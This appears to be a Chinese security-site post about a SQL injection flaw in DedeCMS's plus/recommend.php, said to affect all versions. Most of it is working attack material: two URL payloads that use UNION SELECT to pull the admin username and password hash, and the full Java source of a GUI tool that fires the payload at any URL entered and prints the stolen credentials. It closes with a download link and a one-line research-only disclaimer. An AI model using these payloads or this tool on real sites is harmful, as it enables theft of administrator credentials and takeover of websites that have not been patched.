开源项目

DedeCMS全版本通杀SQL注入漏洞利用代码及工具

dedecms即织梦(PHP开源网站内容管理系统)。织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下:

www.xxx.com/plus/recommend.php….

EXP:

1
2
3
4
5
plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'  
  or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select    
CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`   
limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type]  
 [type]=application/octet-stream&_FILES[type][size]=111

EXP2:

1
plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294

利用工具源码(by 园长):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
package org.javaweb.dede.ui;  
import java.awt.Toolkit;  
import java.io.BufferedReader;  
import java.io.InputStreamReader;  
import java.net.URL;  
import java.util.regex.Matcher;  
import java.util.regex.Pattern;  
    
/**  
 *  
 * @author yz  
 */  
public class MainFrame extends javax.swing.JFrame {  
    
    private static final long serialVersionUID = 1L;  
    
    /**  
     * Creates new form MainFrame  
     */  
    public MainFrame() {  
        initComponents();  
    }  
    
    public String request(String url){  
        String str = "",tmp;  
        try {  
            BufferedReader br = new BufferedReader(new InputStreamReader(new URL(url).openStream()));  
            while((tmp=br.readLine())!=null){  
                str+=tmp+"\r\n";  
            }  
        } catch (Exception e) {  
            jTextArea1.setText(e.toString());  
        }  
        return str;  
    }  
    
    private void initComponents() {  
    
        jPanel1 = new javax.swing.JPanel();  
        jLabel1 = new javax.swing.JLabel();  
        jTextField1 = new javax.swing.JTextField();  
        jButton1 = new javax.swing.JButton();  
        jScrollPane1 = new javax.swing.JScrollPane();  
        jTextArea1 = new javax.swing.JTextArea();  
    
        setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);  
    
        jLabel1.setText("URL:");  
        jTextField1.setText("http://localhost");  
    
        this.setTitle("DedeCms recommend.php注入利用工具-p2j.cn");  
    
        int screenWidth = Toolkit.getDefaultToolkit().getScreenSize().width;  
        int screenHeight = Toolkit.getDefaultToolkit().getScreenSize().height;  
        this.setBounds(screenWidth / 2 - 229, screenHeight / 2 - 158, 458, 316);  
    
        jButton1.setText("获取");  
        jButton1.addActionListener(new java.awt.event.ActionListener() {  
            public void actionPerformed(java.awt.event.ActionEvent evt) {  
                jButton1ActionPerformed(evt);  
            }  
        });  
    
        jTextArea1.setColumns(20);  
        jTextArea1.setRows(5);  
        jScrollPane1.setViewportView(jTextArea1);  
    
        javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1);  
        jPanel1.setLayout(jPanel1Layout);  
        jPanel1Layout.setHorizontalGroup(  
            jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)  
            .addGroup(jPanel1Layout.createSequentialGroup()  
                .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING, false)  
                    .addComponent(jScrollPane1, javax.swing.GroupLayout.Alignment.LEADING)  
                    .addGroup(javax.swing.GroupLayout.Alignment.LEADING, jPanel1Layout.createSequentialGroup()  
                        .addContainerGap()  
                        .addComponent(jLabel1)  
                        .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)  
                        .addComponent(jTextField1, javax.swing.GroupLayout.PREFERRED_SIZE, 331, javax.swing.GroupLayout.PREFERRED_SIZE)  
                        .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)  
                        .addComponent(jButton1, javax.swing.GroupLayout.PREFERRED_SIZE, 83, javax.swing.GroupLayout.PREFERRED_SIZE)))  
                .addGap(0, 0, Short.MAX_VALUE))  
        );  
        jPanel1Layout.setVerticalGroup(  
            jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)  
            .addGroup(jPanel1Layout.createSequentialGroup()  
                .addContainerGap()  
                .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)  
                    .addComponent(jLabel1)  
                    .addComponent(jTextField1,  
 javax.swing.GroupLayout.PREFERRED_SIZE,   
javax.swing.GroupLayout.DEFAULT_SIZE,   
javax.swing.GroupLayout.PREFERRED_SIZE)  
                    .addComponent(jButton1))  
                .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)  
                .addComponent(jScrollPane1, javax.swing.GroupLayout.DEFAULT_SIZE, 254, Short.MAX_VALUE))  
        );  
    
        javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane());  
        getContentPane().setLayout(layout);  
        layout.setHorizontalGroup(  
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)  
            .addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)  
        );  
        layout.setVerticalGroup(  
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)  
            .addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)  
        );  
    
        pack();  
    }// </editor-fold>                         
    
    private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {                                          
        String url = jTextField1.getText();  
        if(null==url||"".equals(url)){  
            return ;  
        }  
        String result = request(url+"/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294");  
        Matcher m = Pattern.compile("<h2>(.*)</h2>").matcher(result);  
        if(m.find()){  
            String[] s = m.group(1).split("\\|");  
            if(s.length>2){  
                jTextArea1.setText("UserName:"+s[1]+"\r\nMD5:"+s[2].substring(3,s[2].length()-1));  
            }  
        }  
    }                                         
    
    public static void main(String args[]) {  
        java.awt.EventQueue.invokeLater(new Runnable() {  
            public void run() {  
                new MainFrame().setVisible(true);  
            }  
        });  
    }  
    
    // Variables declaration - do not modify                      
    private javax.swing.JButton jButton1;  
    private javax.swing.JLabel jLabel1;  
    private javax.swing.JPanel jPanel1;  
    private javax.swing.JScrollPane jScrollPane1;  
    private javax.swing.JTextArea jTextArea1;  
    private javax.swing.JTextField jTextField1;  
    // End of variables declaration                    
}

利用工具下载地址 http://pan.baidu.com/s/1sj31RLN (本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!)